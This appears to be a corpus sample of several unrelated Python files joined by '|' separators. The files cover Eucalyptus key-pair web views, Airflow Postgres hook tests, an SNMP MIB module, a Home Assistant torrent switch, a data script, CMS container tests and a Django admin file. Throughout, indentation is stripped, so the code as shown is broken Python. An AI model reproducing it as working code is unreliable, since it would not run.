# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Pyramid views for Eucalyptus and AWS key pairs
"""
import simplejson as json
from boto.exception import BotoServerError
from pyramid.httpexceptions import HTTPFound
from pyramid.view import view_config
from pyramid.response import Response
from ..forms.keypairs import KeyPairForm, KeyPairImportForm, KeyPairDeleteForm
from ..i18n import _
from ..models import Notification
from ..views import BaseView, LandingPageView, JSONResponse
from . import boto_error_handler
class KeyPairsView(LandingPageView):
def __init__(self, request):
super(KeyPairsView, self).__init__(request)
self.title_parts = [_(u'Key Pairs')]
self.initial_sort_key = 'name'
self.prefix = '/keypairs'
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.enable_smart_table = True
@view_config(route_name='keypairs', renderer='../templates/keypairs/keypairs.pt')
def keypairs_landing(self):
json_items_endpoint = self.request.route_path('keypairs_json')
# filter_keys are passed to client-side filtering in search box
self.filter_keys = ['name', 'fingerprint']
# sort_keys are passed to sorting drop-down
self.sort_keys = [
dict(key='name', name=_(u'Name: A to Z')),
dict(key='-name', name=_(u'Name: Z to A')),
]
return dict(
filter_keys=self.filter_keys,
search_facets=[],
sort_keys=self.sort_keys,
prefix=self.prefix,
initial_sort_key=self.initial_sort_key,
json_items_endpoint=json_items_endpoint,
delete_form=self.delete_form,
)
class KeyPairsJsonView(BaseView):
def __init__(self, request):
super(KeyPairsJsonView, self).__init__(request)
self.conn = self.get_connection()
@view_config(route_name='keypairs_json', renderer='json', request_method='POST')
def keypairs_json(self):
if not(self.is_csrf_valid()):
return JSONResponse(status=400, message="missing CSRF token")
keypairs = []
with boto_error_handler(self.request):
for keypair in self.get_items():
keypairs.append(dict(
name=keypair.name,
fingerprint=keypair.fingerprint,
))
return dict(results=keypairs)
def get_items(self):
ret = []
if self.conn:
ret = self.conn.get_all_key_pairs()
return ret
class KeyPairView(BaseView):
"""Views for single Key Pair"""
TEMPLATE = '../templates/keypairs/keypair_view.pt'
def __init__(self, request):
super(KeyPairView, self).__init__(request)
keyname = '/'.join(self.request.subpath)
if keyname == 'new':
keyname = _(u'Create')
if keyname == 'new2':
keyname = _(u'Import')
self.title_parts = [_(u'Key Pair'), keyname]
self.conn = self.get_connection()
self.keypair = self.get_keypair()
self.keypair_route_id = '/'.join(self.request.subpath)
self.keypair_form = KeyPairForm(self.request, keypair=self.keypair, formdata=self.request.params or None)
self.keypair_import_form = KeyPairImportForm(
self.request, keypair=self.keypair, formdata=self.request.params or None)
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.new_keypair_created = True if self._has_file_() else False # Detect if session has new keypair material
self.created_msg = _(u'Successfully created key pair {keypair}'.format(keypair=self.keypair_route_id))
controller_options_json = BaseView.escape_json(json.dumps({
'route_id': self.keypair_route_id,
'keypair_created': self.new_keypair_created,
'keypair_created_msg': self.created_msg,
}))
self.render_dict = dict(
keypair=self.keypair,
keypair_name=self.escape_braces(self.keypair.name) if self.keypair else '',
keypair_route_id=self.keypair_route_id,
keypair_form=self.keypair_form,
keypair_import_form=self.keypair_import_form,
keypair_created=self.new_keypair_created,
delete_form=self.delete_form,
keypair_names=self.get_keypair_names(),
controller_options_json=controller_options_json,
)
def get_keypair(self):
keypair_param = '/'.join(self.request.subpath)
if keypair_param == "new" or keypair_param == "new2":
return None
keypairs_param = [keypair_param]
keypairs = []
if self.conn:
try:
keypairs = self.conn.get_all_key_pairs(keynames=keypairs_param)
except BotoServerError:
return None
keypair = keypairs[0] if keypairs else None
return keypair
@view_config(route_name='keypair_view', renderer=TEMPLATE)
def keypair_view(self):
return self.render_dict
def get_keypair_names(self):
keypairs = []
with boto_error_handler(self.request):
if self.conn:
keypairs = [k.name for k in self.conn.get_all_key_pairs()]
return sorted(set(keypairs))
@view_config(route_name='keypair_create', request_method='POST', renderer=TEMPLATE)
def keypair_create(self):
if self.keypair_form.validate():
name = self.request.params.get('name')
location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, location):
self.log_request(_(u"Creating keypair ") + name)
new_keypair = self.conn.create_key_pair(name)
# Store the new keypair material information in the session
self._store_file_(new_keypair.name + ".pem",
'application/x-pem-file;charset=ISO-8859-1',
new_keypair.material)
msg_template = _(u'Successfully created key pair {keypair}')
msg = msg_template.format(keypair=name)
if self.request.is_xhr:
resp_body = json.dumps(dict(message=msg))
return Response(status=200, body=resp_body, content_type='application/x-pem-file;charset=ISO-8859-1')
else:
location = self.request.route_path('keypair_view', subpath=name)
return HTTPFound(location=location)
if self.request.is_xhr:
form_errors = ', '.join(self.keypair_form.get_errors_list())
return JSONResponse(status=400, message=form_errors) # Validation failure = bad request
else:
self.request.error_messages = self.keypair_form.get_errors_list()
return self.render_dict
@view_config(route_name='keypair_import', request_method='POST', renderer=TEMPLATE)
def keypair_import(self):
if self.keypair_form.validate():
name = self.request.params.get('name')
key_material = self.request.params.get('key_material')
# Return to import form if failure
failure_location = self.request.route_path('keypair_view', subpath='new2')
success_location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, failure_location):
self.log_request(_(u"Importing keypair ") + name)
self.conn.import_key_pair(name, key_material)
msg_template = _(u'Successfully imported key pair {keypair}')
msg = msg_template.format(keypair=name)
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=success_location)
return self.render_dict
@view_config(route_name='keypair_delete', request_method='POST', renderer=TEMPLATE)
def keypair_delete(self):
if self.delete_form.validate():
keypair_name_param = self.request.params.get('name')
keypair_names = [keypair.strip() for keypair in keypair_name_param.split(',')]
location = self.request.route_path('keypairs')
with boto_error_handler(self.request, location):
for keypair_name in keypair_names:
self.log_request(_(u"Deleting keypair ") + keypair_name)
self.conn.delete_key_pair(keypair_name)
prefix = _(u'Successfully deleted keypair')
if len(keypair_names) == 1:
msg = prefix
else:
msg = u'{0} {1}'.format(prefix, ', '.join(keypair_names))
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=location)
return self.render_dict
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import mock
import unittest
from tempfile import NamedTemporaryFile
import psycopg2.extras
import pytest
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import Connection
class TestPostgresHookConn(unittest.TestCase):
def setUp(self):
super(TestPostgresHookConn, self).setUp()
self.connection = Connection(
login='login',
password='password',
host='host',
schema='schema'
)
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
self.db_hook = UnitTestPostgresHook()
self.db_hook.get_connection = mock.Mock()
self.db_hook.get_connection.return_value = self.connection
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_non_default_id(self, mock_connect):
self.db_hook.test_conn_id = 'non_default'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password',
host='host', dbname='schema',
port=None)
self.db_hook.get_connection.assert_called_once_with('non_default')
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn(self, mock_connect):
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "dictcursor"}'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(cursor_factory=psycopg2.extras.DictCursor,
user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_with_invalid_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "mycursor"}'
with self.assertRaises(ValueError):
self.db_hook.get_conn()
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_postgres(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true}'
mock_client.return_value.generate_db_auth_token.return_value = 'aws_token'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='aws_token', host='host',
dbname='schema', port=5432)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_redshift(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true, "redshift":true}'
self.connection.host = 'cluster-identifier.ccdfre4hpd39h.us-east-1.redshift.amazonaws.com'
login = 'IAM:{login}'.format(login=self.connection.login)
mock_client.return_value.get_cluster_credentials.return_value = {'DbPassword': 'aws_token',
'DbUser': login}
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user=login, password='aws_token', host=self.connection.host,
dbname='schema', port=5439)
class TestPostgresHook(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestPostgresHook, self).__init__(*args, **kwargs)
self.table = "test_postgres_hook_table"
def setUp(self):
super(TestPostgresHook, self).setUp()
self.cur = mock.MagicMock()
self.conn = conn = mock.MagicMock()
self.conn.cursor.return_value = self.cur
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
def get_conn(self):
return conn
self.db_hook = UnitTestPostgresHook()
def tearDown(self):
super(TestPostgresHook, self).tearDown()
with PostgresHook().get_conn() as conn:
with conn.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS {}".format(self.table))
@pytest.mark.backend("postgres")
def test_copy_expert(self):
m = mock.mock_open(read_data='{"some": "json"}')
with mock.patch('airflow.hooks.postgres_hook.open', m):
statement = "SQL"
filename = "filename"
self.cur.fetchall.return_value = None
self.assertEqual(None, self.db_hook.copy_expert(statement, filename, open=m))
assert self.conn.close.call_count == 1
assert self.cur.close.call_count == 1
assert self.conn.commit.call_count == 1
self.cur.copy_expert.assert_called_once_with(statement, m.return_value)
self.assertEqual(m.call_args[0], (filename, "r+"))
@pytest.mark.backend("postgres")
def test_bulk_load(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
conn.commit()
with NamedTemporaryFile() as f:
f.write("\n".join(input_data).encode("utf-8"))
f.flush()
hook.bulk_load(self.table, f.name)
cur.execute("SELECT * FROM {}".format(self.table))
results = [row[0] for row in cur.fetchall()]
self.assertEqual(sorted(input_data), sorted(results))
@pytest.mark.backend("postgres")
def test_bulk_dump(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
values = ",".join("('{}')".format(data) for data in input_data)
cur.execute("INSERT INTO {} VALUES {}".format(self.table, values))
conn.commit()
with NamedTemporaryFile() as f:
hook.bulk_dump(self.table, f.name)
f.seek(0)
results = [line.rstrip().decode("utf-8") for line in f.readlines()]
self.assertEqual(sorted(input_data), sorted(results))
|
from .idw import inverse_distance_weighting
|
#
# PySNMP MIB module IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:56:57 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
cjnMgmt, = mibBuilder.importSymbols("Cajun-ROOT", "cjnMgmt")
NetNumber, = mibBuilder.importSymbols("IPX-PRIVATE-MIB", "NetNumber")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter32, Bits, Unsigned32, Gauge32, IpAddress, ObjectIdentity, Integer32, NotificationType, MibIdentifier, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter64, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "Bits", "Unsigned32", "Gauge32", "IpAddress", "ObjectIdentity", "Integer32", "NotificationType", "MibIdentifier", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter64", "iso")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
cjnIpxIfMgmt = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2))
if mibBuilder.loadTexts: cjnIpxIfMgmt.setLastUpdated('9904010000Z')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setOrganization("Lucent's Concord Technology Center (CTC)")
if mibBuilder.loadTexts: cjnIpxIfMgmt.setContactInfo('Marc Cochran -- mcochran@lucent.com')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setDescription('Cajun Private IPX Interface Management MIB')
cjnIpxIfGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1))
cjnIpxIfNextIndex = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setDescription('The next available IfIndex. This number should be used to create new rows in the IpxIfTable.')
cjnIpxIfNumber = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNumber.setDescription('The number of IPX interfaces.')
cjnIpxIfTable = MibTable((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3), )
if mibBuilder.loadTexts: cjnIpxIfTable.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTable.setDescription('A list of Cajun IPX interface entries. The number of entries is given by the value of cjnIpxIfNumber.')
cjnIpxIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1), ).setIndexNames((0, "IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", "cjnIpxIfIndex"))
if mibBuilder.loadTexts: cjnIpxIfEntry.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEntry.setDescription('A Cajun IPX interface instance.')
cjnIpxIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfIndex.setDescription("The globally unique identifier for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setDescription('The status of this row, by which new entries may be created, or old entries deleted from this table.')
cjnIpxIfNetNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 3), NetNumber()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setDescription('The IPX network number associated with this IPX interface.')
cjnIpxIfEncapsType = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ethernetV2", 1), ("ethernet8022", 2), ("ethernetSNAP", 3), ("ethernet8023", 4))).clone('ethernetV2')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setDescription('The Ethernet encapsulation type used on this IPX interface.')
cjnIpxIfVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 5), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setDescription("The interface index of the VLAN for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfName = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 31))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfName.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfName.setDescription('The protocol unique name associated with this interface. This name is limited to 31 characters and may appear in other protocol interface entries such as IP and Appletalk but MAY NOT be duplicated within the cjnIpxIfTable. In other words, other protocols can use this interface name but IPX may only have this name associated with one interface.')
cjnIpxIfTicks = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 7), Integer32().clone(1)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfTicks.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTicks.setDescription('The period of time, in ticks, that it takes to transmit one byte of data, excluding protocol headers, to a destination on the other end of the circuit, if the circuit is free of other traffic.')
cjnIpxIfType20RbcastMode = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("disabled", 1), ("inbound", 2), ("outbound", 3), ("both", 4))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setDescription('The handling of NetBIOS Type 20 packets on the interface. If set to disabled(1), Type 20 packets are neither sent nor received on the interface. If set to inbound(2), Type 20 packets may be received but not sent. If set to outbound(3), Type 20 packets may be sent on the interface but not received. If set to both(4), Type 20 packets may be sent and received.')
cjnIpxIfAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setDescription('The administrative state of this interface. The testing(3) state indicates that no operational packets can be passed. When a managed system initializes, all interfaces start with ifAdminStatus in the down(2) state. As a result of either explicit management action or per configuration information retained by the managed system, ifAdminStatus is then changed to either the up(1) or testing(3) states (or remains in the down(2) state).')
cjnIpxIfOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3), ("lowerLayerDown", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setDescription('The current operational state of this interface. The testing(3) state indicates that no operational packets can be passed. If cjnIpxIfAdminStatus is down(2) then cjnIpxIfOperStatus should be down(2). If cjnIpxIfAdminStatus is up(1) then cjnIpxIfOperStatus should change to up(1) if the interface is ready to transmit and receive network traffic; it should change to lowerLayerDown(4) if the interface is waiting for external actions (such as a port on the VLAN associated with the interface becoming operational).')
mibBuilder.exportSymbols("IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", cjnIpxIfNextIndex=cjnIpxIfNextIndex, cjnIpxIfTable=cjnIpxIfTable, cjnIpxIfAdminStatus=cjnIpxIfAdminStatus, cjnIpxIfMgmt=cjnIpxIfMgmt, cjnIpxIfEncapsType=cjnIpxIfEncapsType, cjnIpxIfName=cjnIpxIfName, cjnIpxIfNetNumber=cjnIpxIfNetNumber, cjnIpxIfRowStatus=cjnIpxIfRowStatus, cjnIpxIfTicks=cjnIpxIfTicks, cjnIpxIfVlanIfIndex=cjnIpxIfVlanIfIndex, cjnIpxIfType20RbcastMode=cjnIpxIfType20RbcastMode, cjnIpxIfGroup=cjnIpxIfGroup, cjnIpxIfOperStatus=cjnIpxIfOperStatus, cjnIpxIfIndex=cjnIpxIfIndex, cjnIpxIfEntry=cjnIpxIfEntry, PYSNMP_MODULE_ID=cjnIpxIfMgmt, cjnIpxIfNumber=cjnIpxIfNumber)
|
"""Support for setting the Transmission BitTorrent client Turtle Mode."""
import logging
from homeassistant.const import CONF_NAME, STATE_OFF, STATE_ON
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import ToggleEntity
from .const import DOMAIN, SWITCH_TYPES
_LOGGING = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Transmission switch."""
tm_client = hass.data[DOMAIN][config_entry.entry_id]
name = config_entry.data[CONF_NAME]
dev = []
for switch_type, switch_name in SWITCH_TYPES.items():
dev.append(TransmissionSwitch(switch_type, switch_name, tm_client, name))
async_add_entities(dev, True)
class TransmissionSwitch(ToggleEntity):
"""Representation of a Transmission switch."""
def __init__(self, switch_type, switch_name, tm_client, name):
"""Initialize the Transmission switch."""
self._name = switch_name
self.client_name = name
self.type = switch_type
self._tm_client = tm_client
self._state = STATE_OFF
self._data = None
self.unsub_update = None
@property
def name(self):
"""Return the name of the switch."""
return f"{self.client_name} {self._name}"
@property
def unique_id(self):
"""Return the unique id of the entity."""
return f"{self._tm_client.api.host}-{self.name}"
@property
def should_poll(self):
"""Poll for status regularly."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state == STATE_ON
@property
def available(self):
"""Could the device be accessed during the last update call."""
return self._tm_client.api.available
def turn_on(self, **kwargs):
"""Turn the device on."""
if self.type == "on_off":
_LOGGING.debug("Starting all torrents")
self._tm_client.api.start_torrents()
elif self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission on")
self._tm_client.api.set_alt_speed_enabled(True)
self._tm_client.api.update()
def turn_off(self, **kwargs):
"""Turn the device off."""
if self.type == "on_off":
_LOGGING.debug("Stopping all torrents")
self._tm_client.api.stop_torrents()
if self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission off")
self._tm_client.api.set_alt_speed_enabled(False)
self._tm_client.api.update()
async def async_added_to_hass(self):
"""Handle entity which will be added."""
self.unsub_update = async_dispatcher_connect(
self.hass,
self._tm_client.api.signal_update,
self._schedule_immediate_update,
)
@callback
def _schedule_immediate_update(self):
self.async_schedule_update_ha_state(True)
async def will_remove_from_hass(self):
"""Unsubscribe from update dispatcher."""
if self.unsub_update:
self.unsub_update()
self.unsub_update = None
def update(self):
"""Get the latest data from Transmission and updates the state."""
active = None
if self.type == "on_off":
self._data = self._tm_client.api.data
if self._data:
active = self._data.activeTorrentCount > 0
elif self.type == "turtle_mode":
active = self._tm_client.api.get_alt_speed_enabled()
if active is None:
return
self._state = STATE_ON if active else STATE_OFF
|
import csv
import time
import os
import pandas as pd
DATA_ROOT = "C:\\RS\\Amazon\\All\\"
MINIMUM_X_CATEGORIES_FILENAME = 'minimum_2_Categories.csv'
timestamp = time.strftime('%y%m%d%H%M%S')
out_filename = os.path.join(DATA_ROOT, timestamp + 'categories_permutations.csv')
with open(out_filename, 'w', newline='', encoding='utf8') as sum_f:
writer = csv.writer(sum_f, delimiter=',', lineterminator='\n')
entire_data = pd.read_csv(os.path.join(DATA_ROOT, MINIMUM_X_CATEGORIES_FILENAME))
categories = entire_data.columns
row = ['idx_cat_a', 'cat_a', 'idx_cat_b', 'cat_b', 'user_count', 'item_count_a', 'item_count_b', 'item_both']
writer.writerow(row)
for idx_cat_a, cat_a in enumerate(categories):
if idx_cat_a == 0:
continue
for idx_cat_b, cat_b in enumerate(categories):
if idx_cat_b <= idx_cat_a:
continue
# print(idx_cat_a, cat_a, idx_cat_b, cat_b)
# user_count_a = entire_data[cat_a].astype(bool).sum()
# user_count_b = entire_data[cat_b].astype(bool).sum()
user_count = entire_data.loc[entire_data[cat_b] != 0, cat_a].astype(bool).sum()
# item_count_a = entire_data[cat_a].sum()
# item_count_b = entire_data[cat_b].sum()
item_count_a = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_a].sum()
item_count_b = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_b].sum()
item_both = item_count_a + item_count_b
row = [idx_cat_a, cat_a, idx_cat_b, cat_b,user_count, item_count_a, item_count_b, item_both]
writer.writerow(row)
|
from persistent.interfaces import IPersistent
import lxml.objectify
import mock
import unittest
import zeit.cms.workingcopy.interfaces
import zeit.edit.container
import zeit.edit.testing
import zeit.edit.tests.fixture
import zope.interface
import zope.security.proxy
class TestContainer(unittest.TestCase):
def get_container(self):
parent = mock.Mock()
parent._p_changed = False
zope.interface.alsoProvides(parent, IPersistent)
class Container(zeit.edit.container.Base):
def _add(self, item):
pass
def _delete(self, key):
pass
def _get_keys(self, node):
return []
return Container(parent, mock.Mock())
def test_delitem_should_set_p_changed(self):
container = self.get_container()
del container['foo']
self.assertTrue(container.__parent__._p_changed)
def test_add_should_set_p_changed(self):
container = self.get_container()
item = mock.Mock()
item.__name__ = 'item'
item.__parent__ = None
container.add(item)
self.assertTrue(container.__parent__._p_changed)
def test_updateOrder_should_set_p_changed(self):
container = self.get_container()
container.updateOrder([])
self.assertTrue(container.__parent__._p_changed)
class UnknownBlockTest(zeit.edit.testing.FunctionalTestCase):
def test_no_factory_for_node_returns_UnknownBlock(self):
xml = lxml.objectify.fromstring("""
<container xmlns:cp="http://namespaces.zeit.de/CMS/cp">
<block cp:type="block" cp:__name__="foo"/>
<something cp:__name__="bar"/>
</container>
""")
container = zeit.edit.tests.fixture.Container(mock.Mock(), xml)
self.assertTrue(zeit.edit.interfaces.IUnknownBlock.providedBy(
container['bar']))
class ContainerTest(zeit.edit.testing.FunctionalTestCase):
def setUp(self):
super(ContainerTest, self).setUp()
self.context = mock.Mock()
zope.interface.alsoProvides(self.context, IPersistent)
self.container = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
def test_slice(self):
blocks = [self.container.create_item('block') for i in range(4)]
expected = [blocks[0], blocks[1]]
expected = [x.__name__ for x in expected]
actual = [x.__name__ for x in self.container.slice(
blocks[0].__name__, blocks[1].__name__)]
self.assertEqual(expected, actual)
def test_get_recursive_finds_item_in_self(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_get_recursive_finds_item_in_child_container(self):
other = self.container.create_item('container')
block = other.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_moving_item_between_containers_sends_event(self):
check_move = mock.Mock()
zope.component.getGlobalSiteManager().registerHandler(
check_move, (zeit.edit.interfaces.IBlock,
zope.lifecycleevent.IObjectMovedEvent))
block = self.container.create_item('block')
other = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
del self.container[block.__name__]
other.add(block)
self.assertTrue(check_move.called)
def test_moved_item_has_new_parent(self):
# Annoying mechanics gymnastics to check that security works.
wc = zeit.cms.workingcopy.interfaces.IWorkingcopy(None)
self.container.__parent__ = wc
other = zeit.edit.tests.fixture.Container(
wc, lxml.objectify.fromstring('<container/>'))
block = self.container.create_item('block')
del self.container[block.__name__]
wrapped = zope.security.proxy.ProxyFactory(block)
other.add(wrapped)
# Since we don't retrieve block from other, this actually checks that
# __parent__ was changed.
self.assertEqual(other, block.__parent__)
def test_getitem_with_int_uses_position(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container[0])
with self.assertRaises(KeyError):
self.container[1]
|
from django.contrib import admin
from .models import Artists, Albums, Tracks
# Register your models here.
admin.site.register([Artists, Albums, Tracks])
|
import numpy as np
import astropy.units as u
from astropy.convolution.kernels import Gaussian2DKernel
from scipy import signal
from ..clean import clean, ms_clean, component, radial_prolate_sphereoidal,\
vec_radial_prolate_sphereoidal
from ..transform import dft_map, idft_map
def test_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
